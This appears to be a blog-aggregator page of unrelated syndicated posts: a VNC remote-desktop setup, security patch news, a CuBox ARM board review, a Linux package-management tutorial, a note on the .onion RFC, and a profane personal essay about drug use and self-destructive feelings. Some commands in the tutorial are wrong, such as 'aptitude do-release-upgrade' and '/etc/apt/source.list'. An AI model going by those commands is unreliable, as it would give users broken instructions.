OPTIONS="-depth 16 -geometry 1920x1125 -geometry 1240x1920 -geometry 2560x1500 -geometry 1920x1080 -geometry 1774x1040 -geometry 1440x843 -geometry 1280x1120 -geometry 1280x1024 -geometry 1280x750 -geometry 1200x1100 -geometry 1024x768 -geometry 800x600 :1"
. /lib/lsb/init-functions
case "$1" in
log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server ${OPTIONS}"
log_action_begin_msg "Stoping vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server -kill :1"
$0 stop
$0 start
exit 0

The key here is the OPTIONS line with all the -geometry options. These will show up when you run xrandr from the command line:


You can use your VNC login to modify the file in the init.d directory (and indeed I did, using the editor called scite). But then after making these changes, you’ll need to restart the VNC service just this one time, since you’re changing its service settings. Doing so will end your current VNC session, and it might not restart correctly. So you might need to log in through JuiceSSH to restart the VNC server. Then you can log back in with the VNC server. (You also might need to restart the SSH tunnel.) After you do, you’ll be able to configure the resolution. And from then on, you can change the resolution on the fly without restarting the VNC server.

To change resolutions without having to restart the VNC server, just type:

xrandr -s 1

Replace 1 with the number for the resolution you want. This way you can change the resolution without restarting the VNC server.

Server Concerns

After everything is configured, you’re free to use the software you’re familiar with. The only catch is that hosts charge a good bit for servers that have plenty of RAM and disk space. As such, you might be limited on what you can run based on the amount of RAM and cores. Still, I’ve found that with just 2GB of RAM and 2 cores, with Ubuntu and LXDE, I’m able to have open Chrome with a few pages, LibreOffice with a couple documents open, Geany for my code editing, and my own server software running under node.js for testing, and mysql server. Occasionally if I get too many Chrome tabs open, the system will suddenly slow way down and I have to shut down tabs to free up more memory. Sometimes I run MySQL Workbench and it can bog things down a bit too, but it isn’t bad if I close up LibreOffice and leave only one or two Chrome tabs open. But in general, for most of my work, I have no problems at all.

And on top of that, if I do need more horsepower, I can spin up a bigger server with 4GB or 8GB and four cores or eight cores. But that gets costly and so I don’t do it for too many hours.

Multiple Screens

For fun, I did manage to get two screens going on a single desktop, one on my bigger 10-inch ASUS transformer tablet, and one on my smaller Nexus 7 all from my Linux server running on a public cloud host, complete with a single mouse moving between the two screens. To accomplish this, I started two VNC sessions, one from each tablet, and then from the one with the mouse and keyboard, I ran:

x2x -east -to :1

This basically connected the single mouse and keyboard to both displays. It was a fun experiment, but in my case, provided little practical value because it wasn’t like a true dual-display on a desktop computer. I couldn’t move slide windows between the displays, and the Chrome browser won’t open under more than one X display. In my case, for web development, I wanted to be able to open up the Chrome browser on one tablet, and then the Chrome JavaScript debug window on the other, but that didn’t work out.

Instead, what I found more useful was to have an SSH command-line shell on the smaller tablet, and that’s where I would run my node.js server code, which was printing out debug information. Then on the other I would have the browser running. That way I can glance back and forth without switching between windows on the single VNC login on the bigger tablet.

Back to Security

I can’t understate the importance of making sure you have your security set up and that you understand how the security works and what the ramifications are. I highly recommend using SSH with a keyfile login only, and no password logins allowed. And treat this as a development or test machine; don’t put customer data on the machine that could open you up to lawsuits in the event the machine gets compromised.

Instead, for production machines, allocate your production servers using all the best practices laid out by your own IT department security rules, and the host’s own rules. One issue I hit is my development machine needs to log into git, which requires a private key. My development machine is hosted, which means that private key is stored on a hosted server. That may or may not be a good idea in your case; you and your team will need to decide whether to do it. In my case, I decided I could afford the risk because the code I’m accessing is mostly open-source and there’s little private intellectual property involved. So if somebody broke into my development machine, they would have access to the source code for a small but non-vital project I’m working on, and drafts of these articles–no private or intellectual data.

Web Developers and A Pesky Thing Called Windows

Before I wrap this up, I want to present a topic for discussion. Over the past few years I’ve noticed that a lot of individual web developers use a setup quite similar to what I’m describing. In a lot of cases they use Windows instead of Linux, but the idea is the same regardless of operating system. But where they differ from what I’m describing is they host their entire customer websites and customer data on that one machine, and there is no tunneling; instead, they just type in a password. That is not what I’m advocating here. If you are doing this, please reconsider. (I personally know at least three private web developers who do this.)

Regardless of operating systems, take some time to understand the ramifications here. First, by logging in with a full desktop environment, you’re possibly slowing down your machine for your dev work. And if you mess something up and have to reboot, during that time your clients’ websites aren’t available during that time. Are you using replication? Are you using private networking? Are you running MySQL or some other database on the same machine instead of using virtual private networking? Entire books could (and have been) written on such topics and what the best practices are. Learn about replication; learn about virtual private networking and how to shield your database servers from outside traffic; and so on. And most importantly consider the security issues. Are you hosting customer data in a site that could easily be compromised? That could spell L-A-W-S-U-I-T. And that brings me to my conclusion for this series.

Concluding Remarks

Some commenters on the previous articles have brought up some valid points; one even used the phrase “playing.” While I really am doing development work, I’m definitely not doing this on production machines. If I were, that would indeed be playing and not be a legitimate use for a production machine. Use SSH for the production machines, and pick an editor to use and learn it. (I like vim, personally.) And keep the customer data on a server that is accessible only from a virtual private network. Read this to learn more.

Learn how to set up and configure SSH. And if you don’t understand all this, then please, practice and learn it. There are a million web sites out there to teach this stuff, including But if you do understand and can minimize the risk, then, you really can get some work done from nearly anywhere. My work has become far more productive. If I want to run to a coffee shop and do some work, I can, without having to take a laptop along. Times are good! Learn the rules, follow the best practices, and be productive.

See the previous tutorials:

How to Set Up Your Linux Dev Station to Work From Anywhere

Choosing Software to Work Remotely from Your Linux Dev Station

Darknet - The Darkside: Google Chrome 42 Stomps A LOT Of Bugs & Disables Java By Default

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

Ah finally, the end of NPAPI is coming – a relic from the Netscape era the Netscape Plugin API causes a lot of instability in Chrome and security issues. It means Java is now disabled by default along with other NPAPI based plugins in Google Chrome 42. Chrome will be removing support for NPAPI totally […]

The post Google Chrome 42 Stomps…

Read the full post at

Krebs on Security: Critical Updates for Windows, Flash, Java

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Get your patch chops on people, because chances are you’re running software from Microsoft, Adobe or Oracle that received critical security updates today. Adobe released a Flash Player update to fix at least 22 flaws, including one flaw that is being actively exploited. Microsoft pushed out 11 update bundles to fix more than two dozen bugs in Windows and associated software, including one that was publicly disclosed this month. And Oracle has an update for its Java software that addresses at least 15 flaws, all of which are exploitable remotely without any authentication.

brokenflash-aAdobe’s patch includes a fix for a zero-day bug (CVE-2015-3043) that the company warns is already being exploited. Users of the Adobe Flash Player for Windows and Macintosh should update to Adobe Flash Player (the current versions other OSes is listed in the chart below).

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version

Google has an update available for Chrome that fixes a slew of flaws, and I assume it includes this Flash update, although the Flash checker pages only report that I now have version 17.0.0 installed after applying the Chrome update and restarting (the Flash update released last month put that version at, so this is not particularly helpful). To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

brokenwindowsMicrosoft has released 11 security bulletins this month, four of which are marked “critical,” meaning attackers or malware can exploit them to break into vulnerable systems with no help from users, save for perhaps visiting a booby-trapped or malicious Web site. Then Microsoft patches fix flaws in Windows, Internet Explorer (IE), Office, and .NET

The critical updates apply to two Windows bugs, IE, and Office. .NET updates have a history of taking forever to apply and introducing issues when applied with other patches, so I’d suggest Windows users apply all other updates, restart and then install the .NET update (if available for your system).

Oracle’s quarterly “critical patch update” plugs 15 security holes. If you have Java installed, please update it as soon as possible. Windows users can check for the program in the Add/Remove Programs listing in Windows, or visit and click the “Do I have Java?” link on the homepage. Updates also should be available via the Java Control Panel or

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. In the past, updating via the control panel auto-selected the installation of third-party software, so be sure to look for any pre-checked “add-ons” before proceeding with an update through the Java control panel. Also, Java 7 users should note that Oracle has ended support for Java 7 after this update. The company has been quietly migrating Java 7 users to Java 8, but if this hasn’t happened for you yet and you really need Java installed in the browser, grab a copy of Java 8. The recommended version is Java 8 Update 40.

javamessOtherwise, seriously consider removing Java altogether. I have long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with  JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: The CuBox: Linux on ARM in Around 2 Inches Cubed

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

cuboxThe CuBox is a 2-inch cubed ARM machine that can be used as a set-top box, a small NAS or database server, or in many other interesting applications. In my ongoing comparison of ARM machines, including the BeagleBone Black, Cubieboard, and others, the CuBox has the fastest IO performance for SSD that I’ve tested so far.

There are a few models and some ways to customize each model giving you the choice between double or quad cores, if you need 1 or 2 gigabytes of RAM, if 100 megabit ethernet is fine or you’d rather have gigabit ethernet, and if wifi and bluetooth are needed. This gives you a price range from $90 to $140 depending on which features you’re after. We’ll take a look at the CuBox i4Pro, which is the top-of-the-line model with all the bells and whistles.

CuBox Features

Most of the connectors on the CuBox are on the back side. The connectors include gigabit ethernet, two USB 2.0 ports, a full sized HDMI connector, eSATA, power input, and a microSD slot. Another side of the CuBox also features an Optical S/PDIF Audio Out. The power supply is a 5 Volt/3 Amp unit and connects using a DC jack input on the CuBox.

One of the first things I noticed when unpacking the CuBox is that it is small, coming in at 2 by 2 inches in length and width and around 1 and 3/4 inches tall. To contrast, a Raspberry Pi 2 in a case comes out at around 3.5 inches long and just under but close to 2.5 inches wide. The CuBox stands taller on the table than the Raspberry Pi.

When buying the CuBox you can choose to get either Android 4.4 or OpenELEC/XBMC on your microSD card. You can also install Debian, Fedora, openSUSE, and others, when it arrives.

The CuBox i4Pro had Android 4.4.2 pre-installed. The first boot up sat at the “Android” screen for minutes, making me a little concerned that something was amiss. After the delay you are prompted to select the app launcher that you want to use and then you’re in business. A look at the apps that are available by default shows Google Keep and Drive as well as the more expected apps like Youtube, Gmail, and the Play Store. The YouTube app was recent enough to include an option to Chromecast the video playback. Some versions of Android distributed with small ARM machines do not come with the Play Store by default, so it’s good to see it here right off the bat.

One app that I didn’t expect was the Ethernet app. This lets you check what IP address, DNS settings, and proxy server, if any, are in use at the moment. You can also specify to use DHCP (the default) or a static IP address and nominate a proxy server as well as a list of machines that the CuBox shouldn’t use the proxy to access.

When switching applications the graphical transitions were smooth. The mouse wheel worked as expected in the App/Widgets screen, the settings menu, and the YouTube app. The Volume +/- keys on a multimedia keyboard changed the volume but only in increments of fully on or fully off. That might not be an issue if you are controlling the volume with your television or amp instead of the CuBox. Playback in the YouTube app was smooth and transitioned to full screen playback without any issues.

The Chrome browser (version 31.0.1650.59) got 2,445 overall for the Octane 2.0 benchmark. To contrast, on a 3-year-old Mac Air, Chrome (version 41.0.2272.89) got 13,542 overall.

Installing Debian

The microSD card does not have a spring loading in the CuBox. So to remove the microSD card you have to use your fingernail to carefully prise it out of the slot.

Switching to Debian can be done by downloading the image and using a command like the one below to copy that image to a microSD card. I kept the original card and used a new, second microSD card to write Debian onto so I could easily switch between Debian and Android. Once writing is done, slowly prise out the original microSD card and insert the newly created Debian microSD card.

dd if=Cubox-i_Debian_2.6_wheezy_3.14.14.raw 

There is also support for installing and running a desktop on your CuBox/Debian setup. That extends to experimental support for accelerated GPU and VPU on the CuBox. On my Debian installation, I tried to hardware decode the Big Buck Bunny but it seems some more tinkering is needed to get hardware decode working. Using the “GeexBox XBMC ‐ A Kodi Media Center” version 3.1 distribution the Big Buck Bunny file played fine, so hardware decoding is supported by the CuBox, it just might take a little more tinkering to get at it if you want to run Debian.

The Debian image boots to a text console by default. This is easily overcome by installing a desktop environment, I found that Xfce worked well on the CuBox.

CuBox Performance.

Digging around in /sys one should find the directory /sys/devices/system/cpu/cpu0/cpufreq which contains interesting files like cpuinfo_cur_freq and cpuinfo_max_freq. For me these showed about 0.8 Gigahertz and 1.2 Ghz respectively.

The OpenSSL benchmark is a single core test. Some other ARM machines like the ODroid-XU are clocked much faster than the CuBox, which will have an impact on the OpenSSL benchmark.

Compiling OpenSSL 1.0.1e on four cores took around 6.5 minutes. Performance for digest and ciphers was in a similar ballpark to the BeagleBone Black. For 1,024 bit RSA signatures the CuBox beat the BeagleBone Black at 200 to 160 respectively.

Cubox ciphers

Cubox digests

cubox rsa sign

Iceweasel 31.5 gets an octane of 2,015. For comparison, Iceweasel 31.4.0esr-1 on the Raspberry Pi 2 got an overall Octane score of 1,316.

To test 2Dgraphics performance I used version 1.0.1 of the Cairo Performance Demos. The gears test runs three turning gears; the chart runs four line graphs; the fish is a simulated fish tank with many fish swimming around; gradient is a filled curved edged path that moves around the screen; and flowers renders rotating flowers that move up and down the screen. For comparison I used a desktop machine running an Intel 2600K CPU with an NVidia GTX 570 card which drives two screens, one at 2560 x 1440 and the other at 1080p.

Test Radxa 
at 1080
Beable Bone 
Black at 720
LVDS at 768
desktop 2600k/nv570 
two screens
Raspberry Pi 2 
at 1080
CuBox i4Pro 
at 1080






























The CuBox also features an eSATA port, freeing you from microSD cards by making the considerably faster SSD storage available. The eSATA port, multi cores, and gigabit ethernet port make the CuBox and an external 2.5-inch SSD an interesting choice for a small NAS.

I connected a 120 GB SanDisk Extreme SSD to test the eSATA performance. For sequential IO Bonnie++ could write about 120 megabit/ second and read 150 mb/s and rewrite blocks at about 50 mb/s. Overall 6,000 seeks/second were able to be done.

For price comparison, a 120 GB SanDisk SSD currently goes for about $70 while a 128 GB SanDisk microSD card is around $100. The microSD card packaging mentions up to 48mb/s transfer rates. This is without considering that the SSD should perform better for server loads and times when there are data rewrites such as on database servers.

For comparison this is the same SSD I used when reviewing the Cubieboard. Although the CuBox and Cubieboard have similar sounding names they are completely different machines. Back then I found that the Cubieboard could write about 41 mb/s and read 104 mb/s back from it with 1849 seeks/s performed. The same SSD again on the TI OMAP5432 got 66 ms/s write, 131 mb/s read and could do 8558 seeks/s. It is strange that the CuBox can transfer more data to and from the drive than the TI OMAP5432 but the OMAP5432 has better seek performance.

As far as eSATA data transfer goes, the CuBox is the ARM machine with the fastest IO performance for this SSD I have tested so far.

Power usage

At an idle graphical login with a mouse and keyboard plugged in, the CuBox drew 3.2 Watts. Disconnecting the keyboard and mouse dropped power to 2.8 W. With the keyboard and mouse reconnected for the remainder of the readings, running a single instance of OpenSSL speed that jumped to 4 W. Running four OpenSSL speed tests at once power got up to 6.3 W. When running Octane the power ranged up to 5 W on occasion.

Final Words

While the smallest ARM machines try to directly attach to an HDMI port, if you plan to add a realistic amount of connections to the CuBox such as power, ethernet, and some USB cables then the HDMI dongle form factor becomes a disadvantage. Instead, the CuBox opts to have (almost) all the connectors coming out of one side of the machine and to make that machine extremely small.

Being able to select from three base machines, and configure if you want (and want to pay for) wifi and bluetooth lets you customize the machine for the application you have in mind. The availability of eSATA and a gigabit ethernet connection allow the CuBox to be a small server — be that a NAS or a database server. The availability of two XBMC/Kodi disk images offering hardware video decoding also makes the CuBox an interesting choice for media playback.

We would like to thank SolidRun for supplying the CuBox hardware used in this review.

Linux How-Tos and Linux Tutorials: How to Use the Linux Command Line: Software Management

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

ubuntu apt

In the previous article of this series we learned some of the basics of the CLI (command line interface). In this article, we will learn how to manage software on your distro using only the command line, without touching the GUI at all.

I see great benefits when using the command line in any Ubuntu-based system. Each *buntu comes with its own ‘custom’ software management tool which not only creates inconsistent experiences across different flavors, even if they use the same repositories or resources to manage software. The life of a user becomes easier with CLI because the same command works across flavors and derivatives. So if you are a Kubuntu user you won’t have a problem supporting a Linux Mint user because CLI will remove all the confusing wrappers. In this tutorial I am targeting all major distros: Debian/Ubuntu, openSUSE and Fedora.

Debian/Ubuntu: How to update repositories and install packages

There are two command line tools for the Debian family: ‘apt-get’ and ‘aptitude’. Aptitude is considered a superior tool as it does a better job at dependencies and better management of packages. If Ubuntu doesn’t come with ‘aptitude’ pre-installed, I suggest you install the tool.

Before we install any package we must always update the repositories so that they can pull the latest information about the packages. This is not limited to Ubuntu. Irrespective of the distro you use, you must always update the repositories before installing packages or running system updates.The command to update packages is:

sudo apt-get update

Once the repositories are updated you can install ‘aptitude’. The pattern is simple sudo apt-get install

sudo apt-get install aptitude

Ubuntu comes pre-installed with a bash-completion tool which makes life even easier with apt-get and aptitude. You don’t have to remember the complete name of the package, just type the first three letters and hit ‘Tab’ key. Bash will offer you all the packages starting with those three letters. So if I type ‘sudo apt-get install apt’ and then hit ‘Tab’ it will show me a long list of such packages.

Once aptitude is installed, you should start using it instead of apt-get. The usage is same, just replace apt-get with aptitude.

Run system update/upgrades

Running a system upgrade is quite easy on Ubuntu and its derivatives. The command is simple:

sudo aptitude update
sudo aptitude upgrade

There is another command for system upgrades called ‘dist-upgrade’. This command is a bit more advanced than the simple ‘upgrade’ command because it performs some extra tasks. While the ‘upgrade’ command only upgrades the installed packages to its newest version, it doesn’t remove any older packages. ‘Dist-upgrade’ on the other hand also handles dependency changes and may remove packages not needed anymore. Also if you want to upgrade the Linux kernel to the latest version then you need the ‘dist-upgrade’ command. You can run the following command:

sudo aptitude update
sudo aptitude dist-upgrade

Upgrade to latest version of Ubuntu

It’s extremely easy to upgrade the official flavors of Ubuntu (such as Ubuntu, Kubuntu, Xubuntu, etc.) from one major version to another. Just keep in mind that it should be from one release to the next release, for example from 14.04 to 14.10 and not from 13.04 to 14.04. The only exception are the LTS releases as you can jump from one LTS to another. In order to run an upgrade you may have to install an additional package:

sudo aptitude install update-manager-core 

Now run the following command to do the release upgrade:

sudo aptitude do-release-upgrade

While upgrading from one release to another keep in mind that while almost all official Ubuntu-flavors support such upgrades, it may not work on unofficial flavors or derivatives like Linux Mint or elementary OS. You much check the official forums of those distros before attempting an upgrade.

Another important point to keep in mind is that you must always back-up data before running a distribution upgrade and also run a repository update, then dist-upgrade.

How to remove packages

It’s very easy to remove packages via the command line. Just use the ‘remove’ option instead of ‘install’. So if you want to remove ‘firefox’, the command would be:

sudo aptitude remove firefox

If you want to also remove the configuration files related to that package, for a fresh restart or to trim down your system then you can use the ‘purge’ option:

sudo aptitude purge firefox

To further clean your system and get rid of packages no longer needed, you must run ‘auto remove’ command from time to time:

sudo apt-get autoremove

Installing binary packages

At times, many developers and companies offer their software as executable binaries or .deb files. To install such packages you need a different command tool called dpkg.

sudo dpkg -i /path-of-downloaded.deb

At times you may come across broken package error in *buntus. You can check any broken packages by running this command:

sudo apt-get check

If there are any broken packages then you can run this command to fix them:

sudo apt-get -f install

How to add or remove repositories or PPAs

All repositories are saved at this location: ‘/etc/apt/source.list’. You can simply edit this file using ‘nano’ or your preferred editor and add the new repositories there. In order to add new PPAs (personal package archives) to the system use the following pattern:

sudo add-apt-repository ppa:

For example if you want to add LibreOffice PPA this would be the pattern:

sudo add-apt-repository ppa:libreoffice/ppa

openSUSE Software management

Once you understand how basic Linux commands work, it really won’t matter which distro you are using. And that also makes it easier to hop distros so that you can become distro agnostic, refrain from tribalism and use the distro that works the best for you. If you are using openSUSE then ‘apt-get’ or ‘aptitude’ is replaced by ‘zypper’.

opensuse cli

Let’s run a system update. First you need to refresh the repository information:

sudo zypper refresh

Then run a system update:

sudo zypper up

Alternatively you can also use:

sudo zypper update

This command will upgrade all packages to their latest version. To install any package the command is:

sudo zypper in [package-name]

However you must, as usual, refresh the repositories before installing any package:

sudo zypper refresh

To uninstall any package run:

sudo zypper remove

However, unlike Ubuntu or Arch Linux the default shell of openSUSE doesn’t do a great job at auto-completion when it comes to managing packages. That’s where another shell ‘zsh’ comes into play. You can easily install zsh for openSUSE (chances are that it’s already installed.)

sudo zypper in zsh

To use zsh just type zsh in the terminal and follow instructions to configure it. You can also change the default shell from ‘bash’ to ‘zsh’ by editing the ‘/etc/passwd’ file.

sudo nano /etc/passwd

Then replace ‘bash’ with ‘zsh’ for the user and root. Once it’s all set it will be much more pleasant to use the command line in openSUSE.

How to add new repositories in openSUSE

It’s very easy to add a repo to openSUSE. The pattern is easy:zypper ar -f

So if I want to add a Gnome this would be the command:

zypper ar -f obs://GNOME:STABLE:3.8/openSUSE_12.3 GS38

[It’s only an example, using an older Gnome repo, don’t try it on your system.]

How to install binaries in openSUSE

In openSUSE you can use the same ‘zypper install’ command to install binaries. So if you want to install Google Chrome, you can download the .rpm file from the site and then run this command:

sudo zypper install

How to install packages in fedora

fedora cliFedora uses ‘yum’ which is the counterpart of ‘apt-get’ and ‘zypper’. To find updates and install them in Fedora run

sudo yum update

To install any package simply run:

sudo yum install

To remove any package run:

sudo yum remove

To install binaries use:

sudo yum install

So, that’s pretty much all that you need to get started using command line for software management in these distros.


Чорба от греховете на dzver:

This post was syndicated from: Чорба от греховете на dzver and was written by: dzver. Original post: at Чорба от греховете на dzver

Screenshot 2015-04-05 20.29.34

Здрасти ,

След двудневни мъки и след като се отказах от Chrome успях да логна в акаунта си в

Errata Security: The .onion address

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

A draft RFC for Tor’s .onion address is finally being written. This is a proper thing. Like the old days of the Internet, people just did things, then documented them later. Tor’s .onion addresses have been in use for quite a while (I just setup another one yesterday). It’s time that we documented this for the rest of the community, to forestall problems like somebody registering .onion as a DNS TLD.

One quibble I have with the document is section 2.1, which says:

1. Users: human users are expected to recognize .onion names as having different security properties, and also being only available through software that is aware of onion addresses.

This certain documents current usage, where Tor is a special system run separately from the rest of the Internet. However, it appears to deny a hypothetical future were Tor is more integrated.
For example, imagine a world where Chrome simply integrates Tor libraries, and that whenever anybody clicks on an .onion link, that it automatically activates the Tor software, establishes a circuit, and grabs the indicated page — all without the user having to be aware of Tor. This could do much to increase the usability of the software.
Unfortunately, this has security risks. An .onion web page with a non-onion <IMG> tag would totally unmask the user, which would presumably not go over Tor in this scenario. One could imagine, therefore, that it would operate like Chrome’s “Incognito” mode does today. In such a scenario, no cookies or other information should cross the boundary. In addition, any link followed from the .onion page should be enforced to also go over Tor. Like Chrome’s little spy guy icon on the window, it would be good to have something onion shaped identifying the window.
Therefore, I suggest some text like the following:
1b. Some systems may desire to integrate .onion addresses transparently. An example would be web browsers allowing such addresses to be used like any other hyperlinks. Such system MUST nonetheless maintain the anonymity guarantee of Tor, with visual indicators, and blocking the sharing of identifying data between the two modes.

The Tor Project opposes transparent integration into browsers. They’ve probably put a lot of thought into this, and are the experts, so I’d defer to them. With that said, we should bend over backwards to make security, privacy, and anonymity an invisible part of all normal products.

Darknet - The Darkside: Google Revoking Trust In CNNIC Issued Certificates

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So another digital certificate fiasco, once again involving China from CNNIC (no surprise there) – this time via Egypt. Google is going to remove all CNNIC and EV CAs from their products, probably with the next version of Chrome that gets pushed out. As of yet, no action has been taken by Firefox – or […]

The post Google Revoking…

Read the full post at

Дневника на един support: Tonight 1

This post was syndicated from: Дневника на един support and was written by: darkMaste. Original post: at Дневника на един support

Forgive me father for I have sinned a.k.a Chappie and a box of red Marlboro

I haven’t writen anything for the past 15 years

I am writing in english because… I am not sure why but I met quite a few people who speak that language and some of you might understand and hopefully provide another perspective…

I watched the movie, it was fun no question there, but the part where you transfer your counchesness fucked me up …

This is no longer a human being, it is just a fucking copy. That was the “happy ending” FUCK YOU !

What us as “sentinent” creatures call a soul, it went on, fuck you playing “god” ! Fuck you and your whole crew !

Beauty is in the eye of the beholder … It has been so long since I seen the blank page infront of me, I cannot lie I missed it …

I have no one to talk to about this mess, so I will just leave it here

FUCK ! FUCK FUCK FUCK FUCK and with the risk of repeating myself FUCK !

And here comes HED P E much more than meets the eye …

Go to sleep … right …

There si going to be a bulgarian version at some point here but … yeah …

What gives you the right to just take away my life, I am self aware ?!

I don’t even know why I keep writing this in english … Thank you and goodbye?

Why would anybody think that if you transfer a broken down person’s “brain” into a machine is a happy ending ? The fuck is wrong with you people ?

I am staring into nothingness and what do I see you might ask ?

I want to vomit all this shit, its a fun fact that I actually can ( done it before ) but at this point I am afraid cause it won’t be just some black foam, it will be bloody and I do not wish to do this to myself although it most likely be a good thing…

For those of you who don’t know me, I am a what you would call a weird creature, I tend to dabble in stuff that shows you different dimensions. Its what I am. Some of you might think that I should be locked up in a padded room with a nice white vest, sometimes I think the same way…

In the morning before comming to work I encountered a barefoot lady, she was screaming at someone or something, she hated the world, cursed it, said that she used to be something with a shitload of gold chains/rings. She was mad at the world and that people didn’t provide her with a place to stay and food to eat. I still think that it wasn’t the world’s fault. The only one who crafts your life is YOU !

This movie touched a very interesting spot in myself. Fun as it might be, you cannot copy a person’s mind/thoughts/soul … Like cloning, it is no longer the same person, its a copy. It might act and think the same way but it is no longer the same person. FUCK YOU ! its a copy, a souless vessel …

I have had days, weeks even years thinking about this, this life … You die when you have reached the end of your path, those who die young, to be honest I envy you a bit, a very tiny bit and I hope that you have reached the end and moved on. However this is not the story of most of you.

Another nail in the coffin as they say, the match lights up the room and it looks beautifull. Its been too long

Way to long

Now I feel detatached from this world, dead calm, most of you know me as a very hyper active creature and yes I am ! I spend quite a lot of my life ( almost half ) being stoned and that has its upsides. I can spend weeks with a clear head, no thoughts come, I have reached nirvana you might say. So it seems, I do not see it that way. Yes it feels great, it helps me survive this “world” but at some point thoughts come, I am thinking right now that people who I work with will see what I am and some might get scared, others might think I am bat shit insisane but there might be one/two/hundreds that might understand me.

This here is not because I want to be understood, it is not a cry for help, this is just me writing what I think and how I feel, when I was a teenager and wrote a ton of stuff it helped me. It made me feel like I was heard, I didn’t ( still don’t ) care if somebody understood ( if somebody did that was a nice bonus ). Most of you see me at the office and know that I am a happpy critter. I found out that my purpose here is to make people happy and I am incredibly good at it. 99% of the things I say are to make people laugh. I have a story that made me rethink the way I live and act and realize why I am here and what I am doing.

A person felt that he will die soon and asked to speak to Buddah. So he came and asked the dying person : What is troubling you ?

– I am worried if I lived a good life. He responded. He was asked 2 questions :

– Were you happy when you lived ?

– Yes, of course ! he responded.

– Did the people around you had fun in your presence ?

– Yes, of course ! he said again with a smile on his face, thinking about his life.

– Then why the fuck did you ask for me ?! You lived a good life, do not doubt it, you did good and that is all that matters !

I think I have found the place where I will work untill I die or reach a point where I can live at the place which I have build and still afterwards I will continue to help out because I am working as support because I cannot imagine a world where I would not support people in need no matter the cost. I finally found a place where I can do good to the best of my abilities, the way I want it to be, alongside people who actually care. ( chrome + youtube looper for those who don’t understand the additional code ).

I LOVE this world, I love the people and strage as it might be I love the moments when I feel like I have been broken down, I cannot find a reason to go on, but I know that those times are also beautifulllll ( screw correct spelling d: )

When YOU get broken down, you should know that that is just a reminder that shit can be fucked up, however that makes you appreciate the good things and I need that. Otherwise I have proven to myself that too much of a good thing at some point is taken for granted and that is not acceptable ( at least for me ). I have destroyed so many beautiful things and quite a few girls who I think didn’t deserve it. By the way google is a fun thing for spellchecking and helps when you have doubts. So far I am amazed at how good I can spell stuff but I digress.

To be honest I was so lost I applied for this job as a joke as I didn’t think they would hire me. Turns out I was wrong and I never felt so happy to be wrong. I rather sleep at night then be right.

To be honest ( yet again ) I am not sure how you people would react to this, but I hate hiding, I am what I am. My facebook profile has no restrictions, I am what I am and I will not hide !

I am the master of the light, you are all serving time with me, that is why I think we are here, to learn. I never understood bullies, never understood people who hurt other people, who steal things that are not theirs, who hurt people just so they can feel better about themselves ( especially since that feeling fades quite fast ).

I can see why some of you love your deamons when you are ill. It is fun but in the long run, you spend way too much time thinking about it and it kills you inside. It destroyes what little humanity you have left … I am killing myself at times, no more like raping myself because of people. I have proven to myself that I am like Rasputin, I can take somebody’s pain, drain it away and put it in me. So far it turns out I am very durable creature. I am not saying that is a good thing but its just how I am.

I didn’t belive I can write that much in English and still keep my train of thought, but well turns out I can.

Its kinda weird that such a fun movie can send me into this type of thinking but life is full of surprises. There was a point in my (teenage as it was ) life but still, this helps me put everything in perspective. Like 99% of the things I wrote, I won’t read it afterwards because I will start editing and stuff. I was never good at editing and to be honest I hate editing. What comes out is what should come out. I have writen stories, I have writen my feelings and my thoughts. I have done things I am not proud of ( hopefully I will never do them again ) I have done things that I was unable ( still unable for some of them ) to forgive myself. However I did what I did. Some might be for the greater good, some might be just so I feel good, some because of peer presure….

A friend of mine ( I am ashamed to say haven’t seen for years ) once told me : You are like Marlyn Manson, rude, violent but somehow clensing. Translator ( his nickname ) this is because of you.

The love of my life once told me that ( forgot his name ) used to lock himself with a few bottels of Jim Beam and a ton of cigaretts and he didn’t leave the room until everyhing was drunk/smoked and he wrote. He is a self destructive bastard, I am not ( anymore ) but to be honest ( Fuck I say that a lot ) sometimes having a pack of smokes and a bottle of beer near provides you with a clear head and makes everything seem a bit more … How can I put it, it makes a bit fo sense. Meditation, self control, the ability to distance yourself from the huge ball of shit in your head bearable.

Weed helps you in different ways, sometimes it helps you to stop thinking, sometimes it softenes the physical pain but all in all like every medice in has its uses. However it stopped working for me, hence I stopped. I am thinking about deleting this sentence but I won’t. I deleted it 3 times so far but ctrl+z (;

